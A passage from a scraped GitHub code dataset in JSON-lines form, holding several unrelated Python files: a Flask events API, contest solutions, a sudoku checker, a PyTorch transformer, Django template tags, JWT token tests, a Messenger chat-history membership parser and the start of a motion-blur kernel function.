new_event, new_event[\"id\"])\n for line_item in line_items:\n line_item[\"event_id\"] = new_event[\"id\"]\n upsert(line_items_collection, line_item)\n\n return jsonify(\"Created Event\")\n\n\n@events_blueprint.route(\"/api/events/\", methods=[\"DELETE\"])\n@jwt_required()\ndef delete_event(event_id):\n \"\"\"\n Delete An Event\n \"\"\"\n event = get_item_by_id(events_collection, event_id)\n line_item_ids = event[\"line_items\"]\n delete_from_collection(events_collection, event_id)\n for line_item_id in line_item_ids:\n remove_event_from_line_item(line_item_id)\n return jsonify(\"Deleted Event\")\n\n\n@events_blueprint.route(\"/api/events//line_items_for_event\", methods=[\"GET\"])\n@jwt_required()\ndef get_line_items_for_event(event_id):\n \"\"\"\n Get All Line Items Belonging To An Event\n \"\"\"\n try:\n event = get_item_by_id(events_collection, event_id)\n line_items = []\n for line_item_id in event[\"line_items\"]:\n line_items.append(get_item_by_id(line_items_collection, line_item_id))\n return jsonify({\"data\": line_items})\n except Exception as e:\n return jsonify(error=str(e)), 403\n","repo_name":"neerajsamtani/budget.rip","sub_path":"server/resources/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73845929793","text":"\"\"\"\nColumn major 2d array operation\nPrefix count\n\"\"\"\n\n\ndef main():\n r, c = map(int, input().split())\n\n grid = []\n for _ in range(r):\n grid.append([x for x in input()])\n\n result = [[0 for _ in range(c)] for _ in range(r)]\n for j in range(c):\n # Prefix count apples in each column\n col = [0 for _ in range(r)]\n for i in range(r):\n col[i] = 1 if (grid[i][j] == \"a\") else 0\n if i > 0 and grid[i - 1][j] != \"#\":\n col[i] += col[i - 1]\n\n # Draw from bottom to top\n num = col[-1] # Number of apples to be drawn\n for i in range(r):\n k = -i - 1\n if grid[k][j] == \"#\":\n result[k][j] = \"#\"\n num = col[k]\n elif num > 0:\n result[k][j] = \"a\"\n num -= 1\n else:\n result[k][j] = \".\"\n\n for row in result:\n print(\"\".join(row))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jetkan-yk/phyting","sub_path":"cp4/lineards/2darray/apples.py","file_name":"apples.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8508129962","text":"def done_or_not(board): # board[i][j]\n for list in board:\n a = set(list)\n if len(a) != 9:\n return \"Try again!\"\n lister = []\n for i in range(len(board[0])):\n templist = []\n\n for j in range(len(board)):\n templist.append(board[j][i])\n lister.append(templist)\n\n for list in lister:\n a = set(list)\n if len(a) != 9:\n return \"Try again!\"\n\n answer = []\n for r in range(3):\n for c in range(3):\n block = []\n for i in range(3):\n for j in range(3):\n block.append(board[3*r + i][3*c + j])\n answer.append(block)\n\n for block in answer:\n a = set(block)\n if len(a) != 9:\n return \"Try again!\"\n return \"Finished!\"","repo_name":"consolelogreece/Coding-Challenges","sub_path":"Codewars/5 Kyu/Did I finish my Sudoku.py","file_name":"Did I finish my Sudoku.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23421750951","text":"__author__ = 'nik'\n\n\ndef main():\n output_file = open('output', 'w')\n with open('input') as input_file:\n next(input_file)\n case_num = 0\n for line in input_file:\n if line.endswith('\\n'):\n line = line[: len(line) - 1]\n line = line.split(' ')\n\n s = 2\n time = 0\n c = float(line[0])\n f = float(line[1])\n x = float(line[2])\n\n while (x / s) > (x / (s + f) + (c / s)):\n time += c / s\n s += f\n else:\n time += x / s\n\n case_num += 1\n\n out = \"Case #\" + str(case_num) + \": \" + \"{0:.7f}\".format(time) + \"\\n\"\n output_file.write(out)\n print(out)\n\n\nif __name__ == '__main__': main()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1388.py","file_name":"1388.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2723381735","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport copy\nimport math\n\ndef nopeak_mask(size, opt):\n np_mask = np.triu(np.ones((1, size, size)), k=1).astype('uint8')\n np_mask = Variable(torch.from_numpy(np_mask == 0).to(opt.device))\n return np_mask\n\ndef create_masks(src, trg, opt):\n src_mask = (src != opt.src_pad).unsqueeze(-2).to(opt.device)\n\n if trg is not None:\n trg_mask = (trg != opt.trg_pad).unsqueeze(-2).to(opt.device)\n size = trg.size(1) # get seq_len for matrix\n np_mask = nopeak_mask(size, opt).to(opt.device)\n trg_mask = trg_mask & np_mask\n\n else:\n trg_mask = None\n return src_mask, trg_mask\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, heads, d_model, dropout = 0.1):\n super().__init__()\n \n self.d_model = d_model\n self.d_k = d_model // heads\n self.h = heads\n \n self.q_linear = nn.Linear(d_model, d_model)\n self.v_linear = nn.Linear(d_model, d_model)\n self.k_linear = nn.Linear(d_model, d_model)\n \n self.dropout = nn.Dropout(dropout)\n self.out = nn.Linear(d_model, d_model)\n\n def attention(self, q, k, v, d_k, mask=None, dropout=None):\n \n scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(d_k)\n \n if mask is not None:\n mask = mask.unsqueeze(1)\n scores = scores.masked_fill(mask == 0, -1e9)\n \n scores = F.softmax(scores, dim=-1)\n \n if dropout is not None:\n scores = dropout(scores)\n \n output = torch.matmul(scores, v)\n return output\n \n def forward(self, q, k, v, mask=None):\n \n bs = q.size(0)\n \n # perform linear operation and split into N heads\n k = self.k_linear(k).view(bs, -1, self.h, self.d_k)\n q = self.q_linear(q).view(bs, -1, self.h, self.d_k)\n v = self.v_linear(v).view(bs, -1, self.h, self.d_k)\n \n # transpose to get dimensions bs * N * sl * d_model\n k = k.transpose(1,2)\n q = q.transpose(1,2)\n v = v.transpose(1,2)\n \n # calculate attention using function we will define next\n scores = self.attention(q, k, v, self.d_k, mask, self.dropout)\n # concatenate heads and put through final linear layer\n concat = scores.transpose(1,2).contiguous()\\\n .view(bs, -1, self.d_model)\n output = self.out(concat)\n \n return output\n\nclass FeedForward(nn.Module):\n def __init__(self, d_model, d_ff=2048, dropout = 0.1):\n super().__init__() \n \n # We set d_ff as a default to 2048\n self.linear_1 = nn.Linear(d_model, d_ff)\n self.dropout = nn.Dropout(dropout)\n self.linear_2 = nn.Linear(d_ff, d_model)\n \n def forward(self, x):\n x = self.dropout(F.relu(self.linear_1(x)))\n x = self.linear_2(x)\n return x\n\nclass Embedder(nn.Module):\n def __init__(self, vocab_size, d_model):\n super().__init__()\n self.d_model = d_model\n self.embed = nn.Embedding(vocab_size, d_model)\n def forward(self, x):\n return self.embed(x)\n\nclass PositionalEncoder(nn.Module):\n def __init__(self, d_model, max_seq_len = 200, dropout = 0.1):\n super().__init__()\n self.d_model = d_model\n self.dropout = nn.Dropout(dropout)\n # create constant 'pe' matrix with values dependant on \n # pos and i\n pe = torch.zeros(max_seq_len, d_model)\n for pos in range(max_seq_len):\n for i in range(0, d_model, 2):\n pe[pos, i] = \\\n math.sin(pos / (10000 ** ((2 * i)/d_model)))\n pe[pos, i + 1] = \\\n math.cos(pos / (10000 ** ((2 * (i + 1))/d_model)))\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n \n \n def forward(self, x):\n # make embeddings relatively larger\n x = x * math.sqrt(self.d_model)\n #add constant to embedding\n seq_len = x.size(1)\n pe = Variable(self.pe[:,:seq_len], requires_grad=False)\n if x.is_cuda:\n pe.cuda()\n x = x + pe\n return self.dropout(x)\n\nclass EncoderLayer(nn.Module):\n def __init__(self, d_model, heads, dropout=0.1):\n super().__init__()\n self.norm_1 = nn.LayerNorm(d_model)\n self.norm_2 = nn.LayerNorm(d_model)\n self.attn = MultiHeadAttention(heads, d_model, dropout=dropout)\n self.ff = FeedForward(d_model, dropout=dropout)\n self.dropout_1 = nn.Dropout(dropout)\n self.dropout_2 = nn.Dropout(dropout)\n \n def forward(self, x, mask):\n x2 = self.norm_1(x)\n x = x + self.dropout_1(self.attn(x2,x2,x2,mask))\n x2 = self.norm_2(x)\n x = x + self.dropout_2(self.ff(x2))\n return x\n \n# build a decoder layer with two multi-head attention layers and\n# one feed-forward layer\nclass DecoderLayer(nn.Module):\n def __init__(self, d_model, heads, dropout=0.1):\n super().__init__()\n self.norm_1 = nn.LayerNorm(d_model)\n self.norm_2 = nn.LayerNorm(d_model)\n self.norm_3 = nn.LayerNorm(d_model)\n \n self.dropout_1 = nn.Dropout(dropout)\n self.dropout_2 = nn.Dropout(dropout)\n self.dropout_3 = nn.Dropout(dropout)\n \n self.attn_1 = MultiHeadAttention(heads, d_model, dropout=dropout)\n self.attn_2 = MultiHeadAttention(heads, d_model, dropout=dropout)\n self.ff = FeedForward(d_model, dropout=dropout)\n\n def forward(self, x, e_outputs, src_mask, trg_mask):\n x2 = self.norm_1(x)\n x = x + self.dropout_1(self.attn_1(x2, x2, x2, trg_mask))\n x2 = self.norm_2(x)\n x = x + self.dropout_2(self.attn_2(x2, e_outputs, e_outputs, src_mask))\n x2 = self.norm_3(x)\n x = x + self.dropout_3(self.ff(x2))\n return x\n\ndef get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\nclass Encoder(nn.Module):\n def __init__(self, vocab_size, d_model, N, heads, dropout):\n super().__init__()\n self.N = N\n self.embed = Embedder(vocab_size, d_model)\n self.pe = PositionalEncoder(d_model, dropout=dropout)\n self.layers = get_clones(EncoderLayer(d_model, heads, dropout), N)\n self.norm = Norm(d_model)\n def forward(self, src, mask):\n x = self.embed(src)\n x = self.pe(x)\n for i in range(self.N):\n x = self.layers[i](x, mask)\n return self.norm(x)\n \nclass Decoder(nn.Module):\n def __init__(self, vocab_size, d_model, N, heads, dropout):\n super().__init__()\n self.N = N\n self.embed = Embedder(vocab_size, d_model)\n self.pe = PositionalEncoder(d_model, dropout=dropout)\n self.layers = get_clones(DecoderLayer(d_model, heads, dropout), N)\n self.norm = Norm(d_model)\n def forward(self, trg, e_outputs, src_mask, trg_mask):\n x = self.embed(trg)\n x = self.pe(x)\n for i in range(self.N):\n x = self.layers[i](x, e_outputs, src_mask, trg_mask)\n return self.norm(x)\n\nclass Transformer(nn.Module):\n def __init__(self, src_vocab, trg_vocab, d_model, N, heads, dropout):\n super().__init__()\n self.encoder = Encoder(src_vocab, d_model, N, heads, dropout)\n self.decoder = Decoder(trg_vocab, d_model, N, heads, dropout)\n self.out = nn.Linear(d_model, trg_vocab)\n def forward(self, src, trg, src_mask, trg_mask):\n e_outputs = self.encoder(src, src_mask)\n #print(\"DECODER\")\n d_output = self.decoder(trg, e_outputs, src_mask, trg_mask)\n output = self.out(d_output)\n return output\n\ndef get_model(opt, src_vocab, trg_vocab):\n \n assert opt.d_model % opt.heads == 0\n assert opt.dropout < 1\n\n model = Transformer(src_vocab, trg_vocab, opt.d_model, opt.n_layers, opt.heads, opt.dropout)\n model.to(opt.device)\n \n if opt.load_weights is not None:\n print(\"loading pretrained weights...\")\n model.load_state_dict(torch.load(f'{opt.load_weights}/model_weights'))\n else:\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p) \n \n return model\n\ndef train():\n model = get_model()\n\n optimizer = optim.SGD(model.parameters(), lr=0.001)\n\n for data in train_dataloader:\n output = model.forward(data)\n loss = get_loss(output, label)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n","repo_name":"sunzhy3/exercise","sub_path":"code/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73737155074","text":"from django import template\n\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef is_accessible_by(record, user):\n try:\n return record.is_accessible_by(user)\n except (TypeError, AttributeError, IndexError):\n return False\n\n\n@register.filter\ndef check_chart_access(record, user):\n access = True\n for query in record.queries.all():\n if not query.is_accessible_by(user):\n access = False\n return access\n\n\n@register.simple_tag\ndef get_extra_source(record, data):\n if not data:\n return \"\"\n if record.id in data:\n return data[record.id]\n return \"\"\n","repo_name":"Linaro/lite-lava","sub_path":"lava_results_app/templatetags/results_accessibility_tags.py","file_name":"results_accessibility_tags.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23442122321","text":"import collections\ncompare = lambda x, y: collections.Counter(x) == collections.Counter(y)\n\nfile_in = open(\"B.in\", \"r\")\nfile_out = open(\"B-small.out\", \"w\")\n\ndef output (string):\n\tfile_out.write(string + \"\\n\")\n\tprint(string)\n\ncase = 1\nread = 0\nA = 0\nB = 0\nK = 0\nfor number, line in enumerate(list(file_in)):\n\tif number == 0:\n\t\tcontinue\n\tA, B, K = line[:-1].split()\n\tchnce = 0\n\tfor a in range(int(A)):\n\t\tfor b in range(int(B)):\n\t\t\tif a & b < int(K):\n\t\t\t\tchnce += 1\n\toutput(\"Case #{}: \".format(case) + str(chnce))\n\tcase += 1\n\nfile_in.close()\nfile_out.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/436.py","file_name":"436.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8073732684","text":"# author: Huy.Nguyen\n# institute: Hanoi University of Science and Technology\n# file name: _task_event_logger.py\n# project name: LogProducer\n# date: 25/11/2020\n\nfrom logger._logger import Logger\nfrom logger._record import TaskGbpUsdRecord\nfrom iostream import TaskGbpUsdLoader\nfrom config import LoggerConfig\n\n\nclass TaskGbpUsdLogger(Logger):\n\n __instance__ = None\n\n def __init__(self, config: LoggerConfig):\n if TaskGbpUsdLogger.__instance__ is None:\n super().__init__()\n self.__config = config\n self._loader = TaskGbpUsdLoader()\n self._recorder = TaskGbpUsdRecord()\n TaskGbpUsdLogger.__instance__ = self\n else:\n raise Exception(\"Cannot create another instance of {}\".format(self.__class__))\n\n @classmethod\n def get_instance(cls, config: LoggerConfig):\n if cls.__instance__ is None:\n TaskGbpUsdLogger(config)\n return cls.__instance__\n\n def get_name(self):\n return \"GBPUSD LOGGER\"\n","repo_name":"nguyenvanhuybk99/ForexSpark","sub_path":"LogProducer/logger/_task_gbpusd_logger.py","file_name":"_task_gbpusd_logger.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16029886439","text":"# [[1, 2], [5, 6]]\n# [[3, 4], [1, 2]]\n# [[4, 6], [6, 8]]\n\ndef a_b(a, b):\n my_list = []\n if len(a) == len(b):\n for i, j in zip(a, b):\n list1 = []\n for x, y in zip(i, j):\n z = x + y\n list1.append(z)\n print(list1)\n my_list.append(list1)\n else:\n raise ValueError('There is not equal lists')\n return my_list\n\n\nmy = a_b([[1, 2], [5, 6], [7, 8]], [[3, 4], [1, 2], [2, 1]])\nprint(my)\n","repo_name":"stepanskyvlad/Learning-Python","sub_path":"Data_Structures/Lists/interview.py","file_name":"interview.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40233438578","text":"# Tests for code in squarepants/src/main/python/squarepants/plugins/staging_build/tasks/staging_build.py\n#\n# Run with:\n# ./pants test squarepants/src/test/python/squarepants_test/plugins:staging_build\n\nfrom pants_test.tasks.task_test_base import TaskTestBase\n\nfrom squarepants.plugins.sake_wire_codegen.targets.sake_wire_library import SakeWireLibrary\nfrom squarepants.plugins.sake_wire_codegen.targets.wire_proto_path import WireProtoPath\nfrom squarepants.plugins.sake_wire_codegen.tasks.sake_wire_codegen import SakeWireCodegen\n\n\nclass SakeWireCodegenTest(TaskTestBase):\n\n @classmethod\n def task_type(cls):\n return SakeWireCodegen\n\n\n def test_wire_proto_path(self):\n foo_proto_path = self.make_target('foo/src/main/proto:wire-proto', WireProtoPath,\n sources=[\n 'foo/src/main/proto/squareup/foo/foo.proto'\n ])\n bar_proto_path = self.make_target('bar/src/main/proto:wire-proto', WireProtoPath,\n sources=[\n 'bar/src/main/proto/squareup/bar/bar.proto'\n ],\n dependencies=[\n foo_proto_path,\n ])\n sake_wire_library_target = self.make_target('baz:wire-library', SakeWireLibrary,\n sources=[\n 'baz/src/main/proto/squareup/baz/baz.proto'\n ],\n dependencies=[bar_proto_path])\n\n task = self.create_task(self.context(target_roots=[sake_wire_library_target]))\n\n self.assertEquals(['foo/src/main/proto', 'baz', 'bar/src/main/proto'],\n task._calculate_proto_paths(sake_wire_library_target))\n\n","repo_name":"ericzundel/mvn2pants","sub_path":"test/python/squarepants_test/plugins/test_sake_wire_codegen.py","file_name":"test_sake_wire_codegen.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"15719780487","text":"from django.urls import path\nfrom . import views \nurlpatterns = [\n path('Bodegas', views.Bodegas_Consultas,name=\"Bodegas_Consulta\"),\n path('Contactos/',views.Contactos_Consultas,name=\"Contactos_Consulta\"),\n path('Facturas/',views.Facturas_Consulta,name=\"Facturas_Consulta\"),\n path('Movimiento/',views.Movimiento_Consulta,name=\"Movimiento_Consulta\"),\n path('Producto_Consulta',views.Producto_Consulta,name=\"Producto_Consulta\"),\n path('Reporte_Inventario',views.Reporte_Inventario,name=\"Reporte_Inventario\"),\n path('Usuarios',views.Usuario_Consulta,name=\"Usuarios_Consulta\")\n]","repo_name":"GBValdez/Pinturitas","sub_path":"Consultas/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74995542593","text":"from datetime import datetime\n\nimport pytest\n\nfrom everycache_api.auth.helpers import (\n create_jwt_payload,\n create_user_access_token,\n create_user_refresh_token,\n is_token_revoked,\n revoke_all_user_tokens,\n revoke_token,\n save_encoded_token,\n)\nfrom everycache_api.models import Token\nfrom everycache_api.tests.factories.token_factory import TokenFactory\nfrom everycache_api.tests.factories.user_factory import AdminFactory, UserFactory\n\nTOKEN_TYPES = (\"access\", \"refresh\")\n\n\n@pytest.mark.parametrize(\"factory\", (UserFactory, AdminFactory))\ndef test_create_jwt_payload(factory):\n user = factory()\n\n assert create_jwt_payload(user) == {\"identity\": user.ext_id, \"additional_claims\": {\n \"role\": user.role.name}}\n\n\ndef test_create_user_access_token(mocker):\n user = UserFactory()\n\n mock = mocker.patch(\"everycache_api.auth.helpers.create_access_token\")\n create_user_access_token(user)\n\n mock.assert_called_once()\n\n\ndef test_create_user_refresh_token(mocker):\n user = UserFactory()\n\n mock = mocker.patch(\"everycache_api.auth.helpers.create_refresh_token\")\n create_user_refresh_token(user)\n\n mock.assert_called_once()\n\n\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_save_encoded_token(token_type, mocker):\n user = UserFactory()\n decoded_token = {\n \"jti\": \"test_jti\",\n \"exp\": datetime.now().timestamp(),\n \"type\": token_type,\n \"sub\": user.ext_id\n }\n mocker.patch(\"everycache_api.auth.helpers.decode_token\",\n return_value=decoded_token)\n\n token = create_user_access_token(user)\n result = save_encoded_token(token)\n assert result\n\n assert Token.query.count() == 1\n token = Token.query.first()\n\n assert token.jti == decoded_token[\"jti\"]\n assert token.token_type == decoded_token[\"type\"]\n assert token.user_id == user.id_\n assert token.expires == datetime.fromtimestamp(decoded_token[\"exp\"])\n assert token.revoked is False\n\n\n@pytest.mark.parametrize(\"revoked\", (True, False))\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_is_token_revoked(revoked, token_type):\n token = TokenFactory(revoked=revoked, token_type=token_type)\n sub = token.user.ext_id\n res = is_token_revoked({\"jti\": token.jti, \"type\": token_type, \"sub\": sub})\n assert res == revoked\n\n\ndef test_is_token_revoked_not_found():\n with pytest.raises(Exception):\n is_token_revoked({\"jti\": \"t_jti\", \"type\": \"t_tt\", \"sub\": \"t_sub\"})\n\n\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_revoke_token(token_type):\n token = TokenFactory(token_type=token_type)\n assert token.revoked is False\n\n revoke_token(\n {\"jti\": token.jti, \"sub\": token.user.ext_id, \"type\": token_type})\n\n assert token.revoked is True\n\n\ndef test_revoke_token_no_token():\n with pytest.raises(Exception):\n revoke_token({\"jti\": \"jti\", \"sub\": \"ext_id\", \"type\": \"token_type\"})\n\n\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_revoke_one_token(token_type):\n token_1 = TokenFactory(token_type=token_type)\n token_2 = TokenFactory(user=token_1.user, token_type=token_type)\n\n assert not token_1.revoked\n assert not token_2.revoked\n\n revoke_token(\n {\"jti\": token_2.jti, \"sub\": token_2.user.ext_id, \"type\": token_type})\n\n assert not token_1.revoked\n assert token_2.revoked\n\n\ndef test_revoke_all_user_tokens():\n user_1 = UserFactory()\n token_1 = TokenFactory(user=user_1)\n token_2 = TokenFactory(user=user_1)\n\n assert not any((token_1.revoked, token_2.revoked))\n\n revoke_all_user_tokens(user_1)\n\n assert all((token_1.revoked, token_2.revoked))\n\n\ndef test_revoke_all_user_tokens_other_users():\n user_1 = UserFactory()\n user_2 = UserFactory()\n token_1 = TokenFactory(user=user_1)\n token_2 = TokenFactory(user=user_1)\n token_3 = TokenFactory(user=user_2)\n\n assert not any((token_1.revoked, token_2.revoked, token_3.revoked))\n\n revoke_all_user_tokens(user_1)\n\n assert all((token_1.revoked, token_2.revoked))\n assert not token_3.revoked\n\n\ndef test_revoke_all_user_tokens_none_found():\n user_1 = UserFactory()\n assert revoke_all_user_tokens(user_1)\n","repo_name":"everycache-group/everycache-app","sub_path":"api/everycache_api/tests/auth/test_auth_helpers.py","file_name":"test_auth_helpers.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29820609849","text":"import datetime\nimport re\n\nfrom DataBuilder.ChatParsing import ChatHistory\nfrom DataBuilder.MessageParsing import Message\nfrom DataBuilder.ParticipantParsing import Participant\n\n\nclass MembershipRecord(object):\n\n def __init__(self, message: Message,\n timestamp: datetime.datetime,\n record_type: str, actor: Participant or None,\n target: Participant, estimate: bool = False) -> None:\n self.OriginalMessage = message\n self.timestamp = timestamp\n self.RecordType = record_type\n self.Actor = actor\n self.Target = target\n self.Estimate = estimate\n\n def __str__(self):\n str = \"\\nActor: \" + self.Actor.Name + \\\n \"\\nDate: \" + self.timestamp.__str__() + \\\n \"\\nRecord Type: \" + self.RecordType + \\\n \"\\nEstimate: \" + self.Estimate.__str__()\n return str\n\n\ndef person__added_or_removed__reconstruction(chat_history: ChatHistory) -> None:\n \"\"\"\n\n :param chat_history:\n :return:\n \"\"\"\n\n message_type_switch = {\n \"ADDED\": _process_added_message,\n \"REMOVED\": _process_removed_message,\n \"LEFT\": _process_left_message,\n \"NONE\": None\n }\n\n ''' Chat Mesages for Ease of Calling '''\n chat_messages = chat_history.ChatMessages\n\n potential_messages = []\n\n for m in chat_messages:\n member = _check_if_member_message(m, chat_history)\n\n if member:\n potential_type = _check_potential_type(m)\n potential_messages.append((m, potential_type))\n\n for m, t in potential_messages: # Construct the Membership History from Messages Sent to Chat\n message_type_switch[t](m, chat_history)\n\n _construct_original_membership(chat_history)\n\n\ndef _construct_original_membership(chat_history: ChatHistory):\n people = chat_history.ChatParticipants\n chat_history.ChatMessages.sort(key=lambda x: x.timestamp, reverse=False)\n messages = chat_history.ChatMessages\n\n for p in people:\n\n people[p].MemberShipRecords.sort(key=lambda x: x.timestamp, reverse=False)\n persons_records = people[p].MemberShipRecords\n\n if (len(persons_records) == 0 and len(people[p].Messages) > 0) or \\\n persons_records[0].RecordType == (\"REMOVED\" or \"LEFT\"):\n people[p].Messages.sort(key=lambda x: x.timestamp)\n first_message = people[p].Messages[0]\n record = MembershipRecord(first_message, first_message.timestamp, \"ADDED\", None, people[p], True)\n people[p].MemberShipRecords.append(record)\n people[p].Messages.sort(key=lambda x: x.timestamp)\n elif len(persons_records) == 0 and len(people[p].Messages) == 0:\n first_message = messages[0]\n record = MembershipRecord(first_message, first_message.timestamp, \"ADDED\", None, people[p], True)\n people[p].MemberShipRecords.append(record)\n\n\ndef _check_if_member_message(message: Message, chat_history: ChatHistory) -> bool:\n ''' Compile Regex for Finding the Right Messages'''\n correct_format_regex = \\\n re.compile(\n '.* (?:added|removed|left).*.') # Check if Potential Message is of the acceptable format to be an added message\n\n correct_format = correct_format_regex.match(message.Content.__str__())\n\n if correct_format \\\n and not _check_if_poll(message.Content.__str__()) \\\n and not _check_if_plan(message.Content.__str__()) \\\n and _nick_matches_sender(message, chat_history):\n return True\n\n return False\n\n\ndef _check_if_poll(message: str):\n removed_vote_regex = re.compile('.* removed vote for .* in the poll: .*')\n\n if removed_vote_regex.match(message):\n return True\n else:\n return False\n\n\ndef _check_if_plan(message: str):\n removed_plan_regex = re.compile('.* removed the plan location.')\n\n if removed_plan_regex.match(message):\n return True\n else:\n return False\n\n\ndef _check_potential_type(message: Message) -> str:\n if \"added\" in message.Content.__str__():\n return \"ADDED\"\n elif \"removed\" in message.Content.__str__():\n return \"REMOVED\"\n elif \"left\" in message.Content.__str__():\n return \"LEFT\"\n else:\n return \"NONE\"\n\n\ndef _process_removed_message(message: Message, chat_history: ChatHistory):\n get_name_regex = re.compile('(?<=removed ).*(?= from the group)')\n\n match = get_name_regex.search(message.Content.__str__()).group()\n\n chat_history.ChatParticipants[match].MemberShipRecords.append(\n MembershipRecord(message,\n message.timestamp,\n \"REMOVED\",\n chat_history.ChatParticipants[message.Sender],\n chat_history.ChatParticipants[match]))\n\n\ndef _process_added_message(message: Message, chat_history):\n names_added_regex = re.compile('(?<=added ).*(?=.)')\n\n names = names_added_regex.search(message.Content.__str__()).group()\n\n if \" and \" in names:\n separate_names_regex = re.compile('(.*)(?= and )|(?<= and )(.*)')\n separate_names = separate_names_regex.findall(names)\n\n first_person = separate_names[0][0]\n second_person = separate_names[2][1]\n\n chat_history.ChatParticipants[first_person].MemberShipRecords.append(\n MembershipRecord(message,\n message.timestamp,\n \"ADDED\",\n chat_history.ChatParticipants[message.Sender],\n chat_history.ChatParticipants[first_person]))\n\n check_actual_person_regex = re.compile('[0-9]* others')\n match = check_actual_person_regex.search(second_person)\n\n if not match:\n chat_history.ChatParticipants[second_person].MemberShipRecords.append(\n MembershipRecord(message,\n message.timestamp,\n \"ADDED\",\n chat_history.ChatParticipants[message.Sender],\n chat_history.ChatParticipants[second_person]))\n\n else:\n chat_history.ChatParticipants[names].MemberShipRecords.append(\n MembershipRecord(message,\n message.timestamp,\n \"ADDED\",\n chat_history.ChatParticipants[message.Sender],\n chat_history.ChatParticipants[names]))\n\n\ndef _process_left_message(message: Message, chat_history):\n chat_history.ChatParticipants[message.Sender].MemberShipRecords.append(\n MembershipRecord(message,\n message.timestamp,\n \"LEFT\",\n chat_history.ChatParticipants[message.Sender],\n chat_history.ChatParticipants[message.Sender]))\n\n\ndef _nick_actor(message: str) -> str:\n potential_adder_regex = \\\n re.compile(\"((.*)(?=(?: added| removed| left).*))\") # Get the Nickname of the potential adder\n nick = potential_adder_regex.match(message).group()\n return nick\n\n\ndef _nick_matches_sender(message, chat_history):\n actor_nick = _nick_actor(message.Content.__str__())\n\n if actor_nick == \"You\":\n actor_nick = chat_history.DataOwner\n\n if actor_nick in chat_history.ChatParticipants[message.Sender].Nicknames or actor_nick == message.Sender:\n return True\n\n return False\n","repo_name":"ben-dow/MessengerAnalysis","sub_path":"Facebook Messenger Analysis/DataBuilder/MemberShipParsing.py","file_name":"MemberShipParsing.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8376680419","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/24 下午10:18\n# @Author : Chen Junhua\n# @File : main.py\n# @Software: PyCharm\n\n# from .service import store_product_link, wait_for_login\n# from .goods import Good\nfrom selenium import webdriver\n# from json import dump, load\nfrom app.models import Session\nfrom app.models.databases import Brands, Goods\n\nchrome_opt = webdriver.ChromeOptions()\n# chrome_opt.add_argument(\"--headless\")\nbrowser = webdriver.Chrome(chrome_options=chrome_opt)\nbrowser.implicitly_wait(30)\nsession = Session()\n\ndef run():\n while True:\n brand_name = input('++++++请输入品牌名称:')\n if brand_name:\n break\n new_brand = Brands(name=brand_name, state=0)\n session.add(new_brand)\n session.commit()\n brand_id = Brands.brand_id(brand_name, session)\n good = Goods(\n brand_id = brand_id,\n taobao_name='',\n taobao_link=''\n )\n\n\nif __name__ == '__main__':\n run()","repo_name":"chjh0612/pet_planet","sub_path":"srcipt/taobao/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37861722062","text":"import math\nimport math\n\nimport cv2\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# 模糊核生成\ndef get_motion_dsf(image_size, motion_dis, motion_angle):\n PSF = np.zeros(image_size) # 点扩散函数\n x_center = (image_size[0] - 1) / 2\n y_center = (image_size[1] - 1) / 2\n\n sin_val = math.sin(motion_angle * math.pi / 180)\n cos_val = math.cos(motion_angle * math.pi / 180)\n\n # 将对应角度上motion_dis个点置成1\n for i 